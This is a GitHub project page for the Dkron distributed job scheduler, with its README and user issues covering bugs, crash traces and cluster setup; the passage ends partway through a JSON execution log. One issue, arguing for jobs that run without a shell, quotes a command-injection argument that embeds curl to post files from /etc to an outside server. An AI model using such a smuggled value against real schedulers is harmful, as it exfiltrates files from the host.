
distribworks / dkron


Dkron - Distributed, fault tolerant job scheduling system https://dkron.io

License: GNU Lesser General Public License v3.0

Makefile 0.58% Go 69.13% Shell 0.67% HTML 2.00% JavaScript 15.46% CSS 0.86% Dockerfile 0.05% SCSS 2.41% TypeScript 8.42% Jinja 0.41%
scheduled-jobs fault-tolerance cron distributed-systems

dkron's Introduction

Dkron

Dkron - Distributed, fault tolerant job scheduling system for cloud native environments

Website: http://dkron.io/

Dkron is a distributed cron service that is easy to set up and fault tolerant, with a focus on:

  • Easy: Easy to use with a great UI
  • Reliable: Completely fault tolerant
  • Highly scalable: Able to handle high volumes of scheduled jobs and thousands of nodes

Dkron is written in Go and leverages the power of the Raft protocol and Serf to provide fault tolerance, reliability and scalability, while remaining simple and easy to install.

Dkron is inspired by the Google whitepaper Reliable Cron across the Planet and by Airbnb Chronos, borrowing many of the same features.

Dkron runs on Linux, OSX and Windows. It can be used to run scheduled commands on a server cluster using any combination of servers for each job. It has no single point of failure due to the use of the Gossip protocol and fault tolerant distributed databases.

You can use Dkron to run the most important part of your company: scheduled jobs.

Installation

Installation instructions

Full, comprehensive documentation is viewable on the Dkron website

Development Quick start

The best way to test and develop Dkron is using Docker; you will need Docker installed before proceeding.

Clone the repository.

Next, run the included Docker Compose config:

docker-compose up

This will start Dkron instances. To add more Dkron instances to the cluster:

docker-compose up --scale dkron-server=4
docker-compose up --scale dkron-agent=10

Check the port mapping using docker-compose ps and use the browser to navigate to the Dkron dashboard using one of the ports mapped by compose.

To add jobs to the system, read the API docs.
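
As a quick illustration, here is a minimal Go sketch that posts a job to the REST API. It mirrors the curl examples quoted in the issues further down this page; the address assumes a local instance listening on port 8080, and the role tag is a placeholder for whatever tag your agents actually carry.

    package main

    import (
        "bytes"
        "fmt"
        "net/http"
    )

    func main() {
        // Job definition: run `uptime` every minute on nodes tagged role=my-role (placeholder tag).
        job := []byte(`{
            "name": "sample_job",
            "schedule": "0 * * * * *",
            "command": "uptime",
            "tags": {"role": "my-role"}
        }`)

        // POST the job to a local Dkron server (adjust host/port to your setup).
        resp, err := http.Post("http://localhost:8080/v1/jobs", "application/json", bytes.NewReader(job))
        if err != nil {
            panic(err)
        }
        defer resp.Body.Close()
        fmt.Println("status:", resp.Status)
    }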

Frontend development

The Dkron dashboard is built using React Admin as a single-page application.

To start developing the dashboard, enter the ui directory and run npm install to get the frontend dependencies, then start the local server with npm start. It should start a new local web server and open a new browser window serving the web UI.

Make your changes to the code, then run make ui to generate the asset files. This is a method of embedding resources in Go applications.
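
For reference, a minimal sketch of the general technique of embedding resources in a Go binary using the standard embed package. This only illustrates the idea; the ui-dist directory name is a placeholder, not necessarily what make ui generates for Dkron.

    package main

    import (
        "embed"
        "net/http"
    )

    // The build step is assumed to copy the compiled dashboard into ui-dist/
    // before `go build`; go:embed then bakes those files into the binary.
    //
    //go:embed ui-dist
    var assets embed.FS

    func main() {
        // Serve the embedded single-page app directly from the binary.
        http.Handle("/", http.FileServer(http.FS(assets)))
        http.ListenAndServe(":8080", nil)
    }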

Resources

Chef cookbook https://supermarket.chef.io/cookbooks/dkron

Python Client Library https://github.com/oldmantaiter/pydkron

Ruby client https://github.com/jobandtalent/dkron-rb

PHP client https://github.com/gromo/dkron-php-adapter

Terraform provider https://github.com/bozerkins/terraform-provider-dkron

Manage and run jobs in Dkron from your django project https://github.com/surface-security/django-dkron

Contributors

Made with contrib.rocks.

Get in touch

dkron's People

Contributors

a69, andreygolev, clarifysky, daffodilistic, dependabot-preview[bot], dependabot[bot], digitalcrab, espina2, fedebev, fopina, kevinwu0904, kevynhale, mgsousa, mlafeldt, naxhh, piter77, prakashdivyy, ramezhanna, richard-julien, rohitpaulk, sandyydk, sysadmind, tengattack, thierry-f-78, ti, vcastellm, whizz, xavib, yvanoers, zaidqureshi2


dkron's Issues

Config file not being loaded

Downloaded the latest release for OSX; running ./dkron agent inside the unzipped folder doesn't seem to read in the config file.

Allow jobs to run without a shell

Currently, dkron runs all jobs in a shell. This is fine in a trusted environment; however, when allowing users to define the commands that are executed, this becomes dangerous.

Our use case is the following: We're allowing our users to provide arguments for cron jobs that all run our own CLI tool. Right now, users could provide arguments like "$(curl -XPOST -d@/etc/... http://their-own-webserver.com)" which dkron would pass to /bin/sh, which in turn would execute the curl command.
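
(For illustration, here is a minimal Go sketch of the difference between the two execution modes; this is hypothetical example code, not dkron's actual executor. A command string passed through /bin/sh has $(...) substitutions expanded, while invoking the program directly with an argument vector does not.)

    package main

    import (
        "fmt"
        "os/exec"
    )

    func main() {
        userArg := "$(date)" // attacker-controlled argument

        // Shell mode: the whole string goes through /bin/sh, so $(date) is expanded.
        out, _ := exec.Command("/bin/sh", "-c", "echo "+userArg).CombinedOutput()
        fmt.Printf("via shell: %s", out) // prints the current date

        // Direct mode: the argument is passed verbatim to the program, no expansion.
        out, _ = exec.Command("echo", userArg).CombinedOutput()
        fmt.Printf("direct:    %s", out) // prints the literal string $(date)
    }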

In order to prevent such exploits, we would like to be able to configure whether a job's command should be run in a shell or not.

What do you think about this functionality?

cc @mlafeldt @Luzifer

Cluster missing executions

As an administrator of a dkron cluster I want my users to have a reliable cron system which guarantees "at least once" execution of their cron tasks.

My setup:

3 AWS EC2s running CoreOS stable, all three machines being part of an etcd cluster, all three machines running dkron 0.6.3 as a cluster. All machines have the role: executor tag and the following cron:

{
    "name": "date",
    "schedule": "0 */5 * * * *",
    "command": "/usr/bin/date",
    "owner": "Knut Ahlers",
    "owner_email": "knut****.com",
    "run_as_user": "core",
    "success_count": 58,
    "error_count": 0,
    "last_success": "2016-02-05T10:45:00.00621402Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
        "role": "executor:1"
    }
}

Expected result:

The cron is executed every 5 minutes and will succeed every single time as it just calls /usr/bin/date (which is the location of the date utility on CoreOS).

Observed result:

The task is sent to one of the machines every 5 minutes and eventually gets executed. However, the cron is missing several executions, which show no end date, no running date utility on the machine, and a failed state.

[screenshot: 2016-02-05 at 11:43:02]

Question

Can you help me with this / tell me what I'm doing wrong? Is there anything I can do to prevent this?

Leader election issues when upgrading from 0.6.3 to 0.7.0

Apparently, the leader election process has changed, and so has the backend storage format. When upgrading an existing cluster, the cluster will not recover from this by itself. The leader key must be deleted manually from the backend storage (in my case Consul). After that, the leader election happens and all is well. Maybe the cluster could recognize that the leader data is in the old format and delete it by itself?

Panic when running job

Hi,

we're currently experiencing a panic when manually running a job:

2016/04/26 16:11:13 http: panic serving 10.8.1.217:62544: runtime error: invalid memory address or nil pointer dereference
goroutine 622306 [running]:
net/http.(*conn).serve.func1(0xc8205866e0, 0x7f90b738adc0, 0xc820022168)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1287 +0xb5
github.com/victorcoder/dkron/vendor/github.com/hashicorp/serf/serf.(*QueryResponse).Close(0x0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/hashicorp/serf/serf/query.go:117 +0xe7
github.com/victorcoder/dkron/dkron.(*AgentCommand).RunQuery(0xc820122120, 0xc820206f00)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/agent.go:723 +0xe49
github.com/victorcoder/dkron/dkron.(*AgentCommand).jobRunHandler(0xc820122120, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:213 +0x2e7
github.com/victorcoder/dkron/dkron.(*AgentCommand).(github.com/victorcoder/dkron/dkron.jobRunHandler)-fm(0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:63 +0x3e
net/http.HandlerFunc.ServeHTTP(0xc82020b600, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
github.com/victorcoder/dkron/vendor/github.com/gorilla/mux.(*Router).ServeHTTP(0xc82000cd70, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/gorilla/mux/mux.go:98 +0x29e
github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).UseHandler.func1.1(0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:55 +0x69
net/http.HandlerFunc.ServeHTTP(0xc8200f2150, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
github.com/victorcoder/dkron/dkron.metaMiddleware.func1.1(0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:78 +0x1ac
net/http.HandlerFunc.ServeHTTP(0xc8200f2180, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).ServeHTTP(0xc820210fa0, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:85 +0x6c
net/http.serverHandler.ServeHTTP(0xc820015e60, 0x7f90b738b580, 0xc82013f810, 0xc8201be0e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1862 +0x19e
net/http.(*conn).serve(0xc8205866e0)
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1361 +0xbee
created by net/http.(*Server).Serve
/Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1910 +0x3f6

I've tracked the error down to these lines of code: (link)

    qr, err := a.serf.Query(QueryRunJob, exJson, params)
    if err != nil {
        log.WithFields(logrus.Fields{
            "query": QueryRunJob,
            "error": err,
        }).Debug("agent: Sending query error")
    }
    defer qr.Close()

From my perspective, the error is not being handled properly. qr.Close is then called on nil, which breaks somewhere in Serf.
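
A guarded version might look like the following sketch; this is just one plausible fix (returning early so the deferred Close never runs on a nil response), not necessarily the change that was applied upstream.

    qr, err := a.serf.Query(QueryRunJob, exJson, params)
    if err != nil {
        log.WithFields(logrus.Fields{
            "query": QueryRunJob,
            "error": err,
        }).Debug("agent: Sending query error")
        return // bail out here: qr is nil and must not be closed
    }
    defer qr.Close()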

Consul - How to specify an ACL token?

(there was previously a bunch of text here; I'm throwing it out since I know the issue.)

How does one go about specifying an ACL token to use for Consul? My whole setup is locked down via tokens, but it seems like in the current form, to get dkron to work with Consul, I'd have to add a write permission to the anonymous token. Is there a way around that?

Specifying executing node count does not work

I am creating a simple example job that I want to run on only one server in the cluster every five seconds:

Job definition:

{
    "name": "uptimesingle",
    "schedule": "*/5 * * * * *",
    "command": "uptime",
    "tags": {
        "role": "nrh_dkron_server:1"
    }
}

Three servers have the corresponding role tag. The first execution happens on only one server, but all subsequent executions happen on all the servers:

[{
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:35.003082159+01:00",
    "finished_at": "2015-12-17T10:47:35.021981973+01:00",
    "success": true,
    "output": "IDEwOjQ3OjM1IHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjg3LCAwLjc4LCAwLjczCg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345655000284700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:40.001009965+01:00",
    "finished_at": "2015-12-17T10:47:40.005702977+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQwIHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjg4LCAwLjc4LCAwLjczCg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345660000339700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:40.064416976+01:00",
    "finished_at": "2015-12-17T10:47:40.067118607+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQwIHVwIDEzMyBkYXlzLCAyMToyNiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDAsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450345660000339700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:40.06495417+01:00",
    "finished_at": "2015-12-17T10:47:40.069631854+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQwIHVwIDM3OCBkYXlzLCAxOTo1MSwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDMsIDAuMDMsIDAuMDAK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450345660000339700,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:45.000775552+01:00",
    "finished_at": "2015-12-17T10:47:45.004132583+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQ1IHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjg5LCAwLjc5LCAwLjczCg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345665000309200,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:45.064704859+01:00",
    "finished_at": "2015-12-17T10:47:45.067112311+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQ1IHVwIDEzMyBkYXlzLCAyMToyNiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDAsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450345665000309200,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:45.065110494+01:00",
    "finished_at": "2015-12-17T10:47:45.067889715+01:00",
    "success": true,
    "output": "IDEwOjQ3OjQ1IHVwIDM3OCBkYXlzLCAxOTo1MSwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDIsIDAuMDMsIDAuMDAK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450345665000309200,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:50.002168058+01:00",
    "finished_at": "2015-12-17T10:47:50.00769461+01:00",
    "success": true,
    "output": "IDEwOjQ3OjUwIHVwIDQ2OCBkYXlzLCA0MiBtaW4sICA1IHVzZXJzLCAgbG9hZCBhdmVyYWdlOiAwLjkwLCAwLjc5LCAwLjc0Cg==",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450345670000230100,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:50.064456879+01:00",
    "finished_at": "2015-12-17T10:47:50.066860985+01:00",
    "success": true,
    "output": "IDEwOjQ3OjUwIHVwIDEzMyBkYXlzLCAyMToyNiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDAsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450345670000230100,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptimesingle",
    "started_at": "2015-12-17T10:47:50.065033688+01:00",
    "finished_at": "2015-12-17T10:47:50.068118228+01:00",
    "success": true,
    "output": "IDEwOjQ3OjUwIHVwIDM3OCBkYXlzLCAxOTo1MSwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDIsIDAuMDMsIDAuMDAK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450345670000230100,
    "job": {
        "name": "uptimesingle",
        "schedule": "*/5 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}]

Work together with kala?

Man, how I wish Kala and Dcron would just work together.

https://github.com/ajvb/kala

https://github.com/victorcoder/dcron

Fusing both would be AWESOME (I'd even like to help).

What Dcron gets right:

  • Distributed by design
  • Raft for the reliable parts, gossip for lightweight sync, a match made in heaven
  • Linux mentality
  • Dashboard included
  • Good docs, nice website, looks serious

What Kala gets right:

  • Built much more directly after Chronos, which has an amazing and battle tested API
  • Using ISO durations instead of NIHing their own format
  • Dependent jobs

A few questions regarding the inner working of dkron

I could not find the answer anywhere, so I hope this is the right place to ask:

  1. Does Dkron wait for a job to end to get the result and total run time? How does Dkron know if a job "failed" or "succeeded"?
  2. If a job runs longer than expected, does Dkron start the job again? For example, if the previous batch is still running, does Dkron know it should wait?

Executing deleted and changed jobs

Dkron keeps executing deleted jobs for some reason. I have started two jobs with a simple curl command and then deleted both jobs, but they still keep executing. I'm not getting the jobs if I list all jobs in dkron. I get these logs in dkron:

INFO[2016-03-02T11:12:00+01:00] agent: Starting job                           job=job1
INFO[2016-03-02T11:09:00+01:00] agent: Starting job                           job=job2
WARN[2016-03-02T11:09:03+01:00] rpc: Received execution done for a deleted job.
WARN[2016-03-02T11:09:03+01:00] rpc: Error calling ExecutionDone              error=rpc: Received execution done for a deleted job.
WARN[2016-03-02T11:09:03+01:00] rpc: Received execution done for a deleted job.
WARN[2016-03-02T11:09:03+01:00] rpc: Error calling ExecutionDone              error=rpc: Received execution done for a deleted job.

If I query the consul key value at /v1/kv/dcron/jobs/?recurse= it's also empty.

If I restart dkron it stops executing the deleted jobs, but it seems to keep the schedule in memory after deletion.

After some digging I realised this seems to be a general issue when you make changes to a job. For example, if I disable a job it does not disable the in-memory schedule, which keeps going. Even worse, if I make multiple changes to a job it creates a new schedule for each change but does not stop the old one, so you end up with multiple parallel executions for a single schedule. If I update a job that runs every second 5 times, it then runs 5 times a second.

I'm using a local consul version 0.6.3 with a single node, and dkron version 0.6.4. Both are running locally on OSX 10.10.2.

Is this a known issue, or am I missing something in the documentation?

How to configure a cluster

I have done it like this:
In one console:
$ ./etcd

And in another console
$ ./dkron agent -server -debug=true -backend-machine=127.0.0.1:2379

That is all OK; I can create jobs and run jobs. But when I try to join another agent to this server to build a cluster, I don't know where it goes wrong. Here is what I do:

I do the following steps on another machine:

 $ ./dkron agent -backend-machine=10.16.28.17:2379 -debug=true                                              
 Starting Dkron agent...
 INFO[2015-12-18T19:27:09+08:00] agent: Dkron agent starting                  
 INFO[2015-12-18T19:27:09+08:00] agent: joining: [127.0.0.1:5001 127.0.0.1:5002] replay: true 
 WARN[2015-12-18T19:27:09+08:00] agent: error joining: dial tcp 127.0.0.1:5002: getsockopt: connection refused 
 INFO[2015-12-18T19:27:09+08:00] agent: Listen for events                     
 DEBU[2015-12-18T19:27:10+08:00] agent: Received event                         event=member-join

It doesn't work. I try to set the 'join' parameter as follows:

$ ./dkron agent -backend-machine=10.16.28.17:2379 -debug=true -join="10.16.28.17:5001"
Starting Dkron agent...
INFO[2015-12-18T19:29:33+08:00] agent: Dkron agent starting                  
INFO[2015-12-18T19:29:33+08:00] agent: joining: [127.0.0.1:5001 127.0.0.1:5002] replay: true 
WARN[2015-12-18T19:29:33+08:00] agent: error joining: dial tcp 127.0.0.1:5002: getsockopt: connection refused 
INFO[2015-12-18T19:29:33+08:00] agent: Listen for events                     
DEBU[2015-12-18T19:29:34+08:00] agent: Received event                         event=member-join

It doesn't work either.

Thanks a lot.

One-off jobs

Feature idea: I have a use case where I need to execute something sometime later, but just once, and then the job should be deleted or archived. I would specify a date and time when I want the job to run, with an optional time window, and dkron would make sure the job is run on the specified servers, or just one of them, within the given window. If the job succeeds, it would be deleted. If not, it would be retried n times in the given window, maybe with exponential backoff. If at the end of the window it still did not run successfully, it would also be deleted, possibly triggering an alert.

delete localhost/8081/jobs/corn_job error

In the file "api.go", the method jobDeleteHandler calls a.etcd.Client.Delete(job, false) without a.etcd.keyspace, so it can't delete the job.

I modified the method like this:

a.etcd.Client.Delete(a.etcd.keyspace+"/jobs/"+job, false)

The delete then returns OK, but my process "dkron2" terminated.

The console shows "Key not found /dcron/jobs/corn_job" and "Terminating dkron2".

DKron Zookeeper Failover not working

When we use multiple backend-machine entries to provide multiple Zookeeper nodes at DKron startup, and the ZK node the dkron server is connected to dies, the DKron server also dies and does not fail over to the other ZK nodes.

Add Serf's -advertise option to Dkron's options

This is a result of #108. The -advertise option seems crucial in running Serf in containers across different hosts. Without it, the container will advertise the container's IP and not the host's, causing the node to fail.

#55 not fixed yet

Issue #55 was closed, but is not fixed yet, I think.

Unfortunately, it's still not working. I tried 0.6.1 and the behavior is the same.

Job definition:

{
    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": 16,
    "error_count": 0,
    "last_success": "2015-12-21T10:05:00.083201311+01:00",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
        "role": "nrh_dkron_server:1"
    }
}

Executions:

[{
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:03:50.084912411+01:00",
    "finished_at": "2015-12-21T10:03:50.099487464+01:00",
    "success": true,
    "output": "IDEwOjAzOjUwIHVwIDM4MiBkYXlzLCAxOTowNywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMjQsIDAuMjEsIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688630000273965,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:00.000599135+01:00",
    "finished_at": "2015-12-21T10:04:00.003453523+01:00",
    "success": true,
    "output": "IDEwOjA0OjAwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuOTYsIDAuOTAsIDAuNzYK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450688640000194942,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:00.080118972+01:00",
    "finished_at": "2015-12-21T10:04:00.083194838+01:00",
    "success": true,
    "output": "IDEwOjA0OjAwIHVwIDEzNyBkYXlzLCAyMDo0MiwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450688640000194942,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:00.080418988+01:00",
    "finished_at": "2015-12-21T10:04:00.08390867+01:00",
    "success": true,
    "output": "IDEwOjA0OjAwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMjAsIDAuMjAsIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688640000194942,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:10.000856912+01:00",
    "finished_at": "2015-12-21T10:04:10.004640213+01:00",
    "success": true,
    "output": "IDEwOjA0OjEwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDEuMDQsIDAuOTIsIDAuNzcK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": 1450688650000365412,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:10.079925794+01:00",
    "finished_at": "2015-12-21T10:04:10.083452121+01:00",
    "success": true,
    "output": "IDEwOjA0OjEwIHVwIDEzNyBkYXlzLCAyMDo0MywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": 1450688650000365412,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
        "run_as_user": "",
        "success_count": 0,
        "error_count": 0,
        "last_success": "0001-01-01T00:00:00Z",
        "last_error": "0001-01-01T00:00:00Z",
        "disabled": false,
        "tags": {
            "role": "nrh_dkron_server"
        }
    }
}, {
    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:10.080275783+01:00",
    "finished_at": "2015-12-21T10:04:10.083116711+01:00",
    "success": true,
    "output": "IDEwOjA0OjEwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMTcsIDAuMTksIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": 1450688650000365412,
    "job": {
        "name": "uptime20151221",
        "schedule": "*/10 * * * * *",
        "command": "uptime",
        "owner": "",
        "owner_email": "",
